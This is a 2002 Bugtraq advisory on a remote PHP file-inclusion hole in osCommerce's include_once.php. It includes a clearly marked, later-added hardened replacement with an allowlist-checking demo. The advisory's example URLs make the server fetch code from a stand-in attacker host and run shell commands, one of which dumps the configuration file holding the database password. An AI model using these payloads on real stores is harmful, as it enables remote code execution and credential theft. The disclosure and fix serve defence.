[25830] in bugtraq
PHP source injection in osCommerce
daemon@ATHENA.MIT.EDU (Tim Vandermeerch)
Mon Jun 17 19:55:53 2002
Date: 16 Jun 2002 15:36:03 -0000
Message-ID: <20020616153603.22505.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Tim Vandermeerch <Tim.Vandermeersch@pandora.be>
To: bugtraq@securityfocus.com
PHP source injection in osCommerce
----------------------------------
Product Description
osCommerce is an open source e-commerce solution under ongoing
development by the open source community. Its feature-packed out-of-the-box
installation allows store owners to set up, run, and maintain their
online stores with minimum effort and at no cost. It can be
found at http://www.oscommerce.com
Tested version
Preview Release 2.1 (06/03/2001)
(this is a preview version, but a lot of online shops already use it)
The Problem
osCommerce comes with a file called /catalog/includes/include_once.php,
which looks like this:
-------- include_once.php --------
<?php
// $include_file is never assigned in this script: with register_globals
// enabled it arrives straight from the request (?include_file=...), so the
// caller controls the path handed to include().
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
}
?>
----------------------------------
If someone requests a URL like
http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE
he would be able to include any code he wants. The script never sets
$include_file itself; with register_globals enabled (the PHP default before
4.2.0) the query-string parameter becomes that variable, and because
include() accepts URLs when allow_url_fopen is on, the file can be fetched
from a server the attacker controls.
This is a serious problem because the included code runs with the web
server's privileges: the attacker could query the SQL server, read other
important files, and so on.
Examples
-------- Example 1 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php
--- a.php ---
<?php passthru("/bin/ls"); ?>
-------------
Output: directory listing of the current directory (the script's own
directory, catalog/includes/)
---------------------------
-------- Example 2 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/b.php
--- b.php ---
<?php passthru("/bin/cat application_top.php"); ?>
-------------
Output: the contents of application_top.php, which includes the MySQL
username, password, ...
---------------------------
Note that MYBOX must serve a.php and b.php as plain text (for example from
a host without a PHP module, or under a name the server does not pass to
PHP). If MYBOX executes PHP itself, the payload runs on MYBOX and only its
output is sent to SERVER.
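For comparison, here is a hardened replacement for the include helper. This is an added example, not osCommerce code and not the vendor's fix: it keeps a request-supplied file name but matches it against a fixed allowlist and resolves it under a fixed base directory, so a URL, a stream wrapper, a NUL-truncated name or a traversal path can never reach include(). The allowlist entries, the base directory, and the temporary directory used by demo() are assumptions made for the example; it targets current PHP rather than the PHP 4 of the advisory.

```php
<?php
// Added example (not osCommerce code): hardened counterpart of include_once.php.
// Only these names may be pulled in through the helper (assumed allowlist).
$ALLOWED_INCLUDES = array(
    'application_top.php',
    'application_bottom.php',
    'header.php',
    'footer.php',
);

/**
 * Resolve a request-supplied include name to an absolute path, or return
 * false if it is not an exact allowlist entry that exists under $base.
 * The name is checked as a plain string before touching the filesystem, so
 * "http://MYBOX/a.php", "../../etc/passwd", "php://input" and
 * "header.php\0.txt" all fail the first test and never reach realpath().
 */
function safe_include_path($name, $base, array $allowed)
{
    // Exact allowlist match: no scheme, slash or NUL byte can pass this.
    if (!is_string($name) || !in_array($name, $allowed, true)) {
        return false;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return false;
    }
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $name);
    // realpath() follows symlinks, so re-check the result is still under $base.
    if ($candidate === false
        || strpos($candidate, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $candidate;
}

// Hardened include-once wrapper. include_once keeps its own per-file table,
// so the define($include_file . '__') guard of the original is not needed.
function include_once_safe($name, $base, array $allowed)
{
    $path = safe_include_path($name, $base, $allowed);
    if ($path === false) {
        // Do not echo the rejected value back: it is attacker-controlled.
        header('HTTP/1.0 400 Bad Request');
        exit;
    }
    include_once $path;
}

// Demonstration: a temporary directory stands in for catalog/includes/ and
// the inputs are the advisory's payload URL plus the usual include tricks.
function demo()
{
    global $ALLOWED_INCLUDES;
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'osc_includes_' . getmypid();
    mkdir($base);
    file_put_contents($base . '/header.php', "<?php\n// dummy header for the demo\n");

    $tests = array(
        'header.php'          => 'allowlisted and present',
        'application_top.php' => 'allowlisted but absent in this demo',
        'http://MYBOX/a.php'  => 'remote URL from the advisory',
        '../../etc/passwd'    => 'path traversal',
        "header.php\0.txt"    => 'NUL-byte truncation',
        'php://input'         => 'PHP stream wrapper',
    );
    foreach ($tests as $name => $what) {
        $result = safe_include_path($name, $base, $ALLOWED_INCLUDES);
        printf("%-26s %-36s => %s\n", addcslashes($name, "\0"), $what,
               $result === false ? 'REJECTED' : 'OK ' . $result);
    }

    unlink($base . '/header.php');
    rmdir($base);
}

demo();
```

Only header.php resolves; the absent allowlisted name is rejected too, because the helper insists the resolved file exists under the base directory rather than trusting the list alone. In osCommerce's case the cleaner fix is to stop reaching include_once.php with a request-controlled name at all; the allowlist pattern is for code that genuinely has to pick an include from user input.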
I informed the vendor and hope that they will release a patch soon
------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be